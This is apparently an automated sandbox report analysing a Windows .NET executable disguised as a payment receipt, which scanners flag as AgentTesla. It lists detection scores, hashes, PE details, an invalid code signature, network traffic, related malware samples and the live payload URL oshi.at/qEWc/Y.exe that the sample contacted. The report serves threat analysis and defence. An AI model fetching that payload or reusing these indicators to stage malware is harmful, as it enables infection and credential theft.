Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	21 Virtualization/Sandbox Evasion	LSASS Memory	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	3 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	4 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Timestomp	NTDS	12 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Ingress Tool Transfer	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PAYMENT_RECEIPT_STAN100699.exe	47%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
PAYMENT_RECEIPT_STAN100699.exe	65%	Virustotal		Browse
PAYMENT_RECEIPT_STAN100699.exe	100%	Avira	TR/Dropper.Gen
PAYMENT_RECEIPT_STAN100699.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
oshi.at	3%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.microsoft.c	0%	URL Reputation	safe
https://oshi.at	0%	Avira URL Cloud	safe
https://oshi.at/qEWc/Y.exe	0%	Avira URL Cloud	safe
http://oshi.atd	0%	Avira URL Cloud	safe
https://oshi.at(	0%	Avira URL Cloud	safe
http://oshi.at(	0%	Avira URL Cloud	safe
http://oshi.at	0%	Avira URL Cloud	safe
http://crl.m#o	0%	Avira URL Cloud	safe
https://oshi.at/qEWc/Y.exe	4%	Virustotal		Browse
https://oshi.at	2%	Virustotal		Browse
https://oshi.at/qEWc/Y.exeG/C	0%	Avira URL Cloud	safe
https://oshi.at/qEWc/Y.exed	0%	Avira URL Cloud	safe
http://oshi.at	3%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
oshi.at	5.253.86.15	true	false	3%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://oshi.at/qEWc/Y.exe	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://oshi.atd	PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000003032000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030C3000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030D0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://oshi.at	PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030C3000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030D0000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://oshi.at(	PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030E2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://oshi.at(	PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030E2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://oshi.at	PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000003032000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030C3000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030D0000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.microsoft.c	PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203166372.0000000001132000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/somenonymous/OshiUpload	PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FD8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030BF000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030AB000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000003097000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030BB000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.000000000308E000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FE4000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000003110000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FC8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000003093000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030B3000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.m#o	PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203166372.0000000001132000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://oshi.at/qEWc/Y.exeG/C	PAYMENT_RECEIPT_STAN100699.exe	false	Avira URL Cloud: safe	unknown
https://oshi.at/qEWc/Y.exed	PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030C3000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030D0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
5.253.86.15	oshi.at	Cyprus		208046	HOSTSLICK-GERMANYNL	false

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1335249
Start date and time:	2023-11-01 08:25:35 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	PAYMENT_RECEIPT_STAN100699.exe
Detection:	MAL
Classification:	mal72.evad.winEXE@1/0@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 21 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target PAYMENT_RECEIPT_STAN100699.exe, PID 7112 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:26:43	API Interceptor	8463262x Sleep call for process: PAYMENT_RECEIPT_STAN100699.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
5.253.86.15	VGuSHbkIxk.exe	Get hash	malicious	Amadey, Djvu, Fabookie, RedLine, SmokeLoader	Browse
	wauCcRjr6j.exe	Get hash	malicious	Djvu, RedLine, SmokeLoader	Browse
	KvVXVfYvlF.exe	Get hash	malicious	BlackGuard, SmokeLoader	Browse
	BHHh.exe	Get hash	malicious	Unknown	Browse
	SCAN_DOC_003930_doc.exe	Get hash	malicious	Unknown	Browse
	PO_756380.js	Get hash	malicious	Unknown	Browse
	PO_756380.js	Get hash	malicious	Unknown	Browse
	nxIBGfk1rr.exe	Get hash	malicious	RedLine	Browse
	lvm.exe.exe	Get hash	malicious	CobaltStrike	Browse
	KJkj2S7Clo.exe	Get hash	malicious	SmokeLoader	Browse
	Draft_Document.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	RedLine	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
oshi.at	VGuSHbkIxk.exe	Get hash	malicious	Amadey, Djvu, Fabookie, RedLine, SmokeLoader	Browse	5.253.86.15
	wauCcRjr6j.exe	Get hash	malicious	Djvu, RedLine, SmokeLoader	Browse	5.253.86.15
	KvVXVfYvlF.exe	Get hash	malicious	BlackGuard, SmokeLoader	Browse	5.253.86.15
	BHHh.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	SCAN_DOC_003930_doc.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	PO_756380.js	Get hash	malicious	Unknown	Browse	5.253.86.15
	PO_756380.js	Get hash	malicious	Unknown	Browse	5.253.86.15
	nxIBGfk1rr.exe	Get hash	malicious	RedLine	Browse	5.253.86.15
	lvm.exe.exe	Get hash	malicious	CobaltStrike	Browse	5.253.86.15
	KJkj2S7Clo.exe	Get hash	malicious	SmokeLoader	Browse	5.253.86.15
	Draft_Document.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	file.exe	Get hash	malicious	RedLine	Browse	5.253.86.15
	rr.exe	Get hash	malicious	RedLine	Browse	51.68.141.111
	HuJLbnfEq3.exe	Get hash	malicious	Nymaim, RedLine	Browse	51.68.141.111
	b82af5f52e227885b6c58f785785481372a9432e415f4.exe	Get hash	malicious	RedLine	Browse	51.68.141.111
	5ASHKzytkq.exe	Get hash	malicious	RedLine, Vidar	Browse	51.68.141.111
	Vde6wWF1N3.exe	Get hash	malicious	RedLine	Browse	51.68.141.111
	INV0100.js	Get hash	malicious	Unknown	Browse	51.68.141.111
	doc201002124110300200.exe	Get hash	malicious	Unknown	Browse	51.68.141.111
	SAMPLE.SPECIFICATION.ORDER.PDF.Gz.exe	Get hash	malicious	Unknown	Browse	51.68.141.111

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HOSTSLICK-GERMANYNL	Yegdeajzb.exe	Get hash	malicious	Remcos	Browse	193.142.59.240
	PRICE_CHART_AND_MORE_DETAILS.exe	Get hash	malicious	Remcos	Browse	193.142.59.6
	ZH-SA_5012023.exe	Get hash	malicious	Remcos, GuLoader	Browse	193.142.59.6
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader	Browse	193.142.59.12
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader	Browse	193.142.59.12
	8t7XJHwvkR.exe	Get hash	malicious	LummaC Stealer, SmokeLoader	Browse	193.142.59.12
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader	Browse	193.142.59.12
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse	193.142.59.12
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader	Browse	193.142.59.12
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse	193.142.59.12
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader	Browse	193.142.59.12
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader, Vidar, Xmrig	Browse	193.142.59.12
	GMUDTQ4Ggf.exe	Get hash	malicious	Amadey, DanaBot, SmokeLoader	Browse	193.142.59.12
	YLtPLmq2O1.exe	Get hash	malicious	Amadey, DanaBot, SmokeLoader	Browse	193.142.59.12
	file.exe	Get hash	malicious	Amadey, Djvu, Glupteba, RedLine, SmokeLoader, Xmrig	Browse	193.142.59.12
	puttygen.exe	Get hash	malicious	Agent Tesla, AgentTesla, Amadey, DanaBot, SmokeLoader	Browse	193.142.59.12
	1.exe	Get hash	malicious	Agent Tesla, AgentTesla, Amadey, DanaBot, SmokeLoader	Browse	193.142.59.12
	MT-OC201011023_jpeg.exe	Get hash	malicious	Remcos, DBatLoader	Browse	193.142.59.6
	MT-501011023.exe	Get hash	malicious	Remcos	Browse	193.142.59.6
	file.exe	Get hash	malicious	Djvu, Glupteba, RedLine, SmokeLoader, Xmrig	Browse	193.142.59.12

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	U1su8hmVj4ourFo.exe	Get hash	malicious	Snake Keylogger, zgRAT	Browse	5.253.86.15
	3vj5tYFb6a.exe	Get hash	malicious	Snake Keylogger, zgRAT	Browse	5.253.86.15
	r9yoXOkPES.exe	Get hash	malicious	Njrat	Browse	5.253.86.15
	61BAN1qUS5.exe	Get hash	malicious	Njrat	Browse	5.253.86.15
	file.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	Checkeur netflix validator by crips.exe	Get hash	malicious	LimeRAT	Browse	5.253.86.15
	New_Order_(2).js	Get hash	malicious	PXRECVOWEIWOEI Stealer, zgRAT	Browse	5.253.86.15
	ify.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	5.253.86.15
	lK3sh4b3ds.exe	Get hash	malicious	Agniane Stealer	Browse	5.253.86.15
	https://docs.google.com/presentation/d/1mPihsFJvaYn8yxmafo1fNbuOr1nDfR-m05559wjl-9k/pub	Get hash	malicious	Unknown	Browse	5.253.86.15
	lK3sh4b3ds.exe	Get hash	malicious	Agniane Stealer	Browse	5.253.86.15
	7nYkVlcnfx.exe	Get hash	malicious	Snake Keylogger	Browse	5.253.86.15
	bcAE21roAv.exe	Get hash	malicious	Snake Keylogger	Browse	5.253.86.15
	#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	file.exe	Get hash	malicious	XFiles Stealer	Browse	5.253.86.15
	AS9Dqsivqk.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	AS9Dqsivqk.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	Invoices.scr.exe	Get hash	malicious	AveMaria	Browse	5.253.86.15
	ZuXcnAYgVp.exe	Get hash	malicious	Njrat	Browse	5.253.86.15
	j6gr7r4Bj2.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	5.253.86.15

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.587256606080595
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	PAYMENT_RECEIPT_STAN100699.exe
File size:	65'088 bytes
MD5:	488cd0c21974d76054d33936d477e0cd
SHA1:	3b9a70a4aaf40b1bada8c337801e35762f9207d2
SHA256:	6049ebd2d0d4238690c57ad4928ad638d26f1b19de398820e12e3bc86f874db0
SHA512:	1c30dc5b426dbd13c7b90e500c34c1b4ba0aced697ec774e0f7ebe90aa410ccc6e49bca336d18df4022a483bcc41e829b68e9760c7a38b44a29a5f8271e04917
SSDEEP:	1536:IX8b/k174ajchuUyj4m7TPxdFP75Fbnd3hT5:IX8bhaghrycmfxvPXj5
TLSH:	3E538D2477975826C7AE293410D687250730E7CA54E3DB8E31CD73168FA33E25B9B68D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.................0.............~.... ........@.. ....................................`................................

File Icon


Icon Hash:	526c6a52d0e4f047

Static PE Info

General

Entrypoint:	0x40b77e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xC000A530 [Fri Jan 29 04:36:00 2072 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/12/2021 00:00:00 08/01/2025 23:59:59
Subject Chain	CN=philandro Software GmbH, O=philandro Software GmbH, L=Stuttgart, S=Baden-W\xfcrttemberg, C=DE
Version:	3
Thumbprint MD5:	EAE713DFC05244CF4301BF1C9F68B1BE
Thumbprint SHA-1:	9CD1DDB78ED05282353B20CDFE8FA0A4FB6C1ECE
Thumbprint SHA-256:	9D7620A4CEBA92370E8828B3CB1007AEFF63AB36A2CBE5F044FDDE14ABAB1EBF
Serial:	0DBF152DEAF0B981A8A938D53F769DB8

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb730	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x1b8c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xb800	0x4640
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb6ee	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x9784	0x9800	False	0.48373252467105265	DIY-Thermocam raw data (Lepton 3.x), scale -10454--28205, spot sensor temperature -0.000048, unit celsius, color scheme 0, calibration: offset 524288.000000, slope 43179624205360936123933285941248.000000	5.818606157009926	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x1b8c	0x1c00	False	0.3441685267857143	data	5.4356084545884205	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe000	0xc	0x200	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xc160	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.2675891181988743
RT_ICON	0xd208	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.5106382978723404
RT_GROUP_ICON	0xd670	0x22	data	0.9705882352941176
RT_VERSION	0xd694	0x30c	data	0.42948717948717946
RT_MANIFEST	0xd9a0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2023 08:26:37.535305023 CET	49741	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:37.535355091 CET	443	49741	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:37.535443068 CET	49741	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:37.552747965 CET	49741	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:37.552766085 CET	443	49741	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:38.168972015 CET	443	49741	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:38.169064999 CET	49741	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:38.173567057 CET	49741	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:38.173578024 CET	443	49741	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:38.174036026 CET	443	49741	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:38.229000092 CET	49741	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:38.347465038 CET	49741	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:38.390486956 CET	443	49741	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:39.263246059 CET	443	49741	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:39.263307095 CET	443	49741	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:39.263355017 CET	49741	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:39.263375044 CET	443	49741	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:39.263461113 CET	443	49741	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:39.263519049 CET	49741	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:39.285299063 CET	49741	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:44.296238899 CET	49742	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:44.296286106 CET	443	49742	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:44.296366930 CET	49742	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:44.296910048 CET	49742	443	192.168.2.4	5.253.86.15
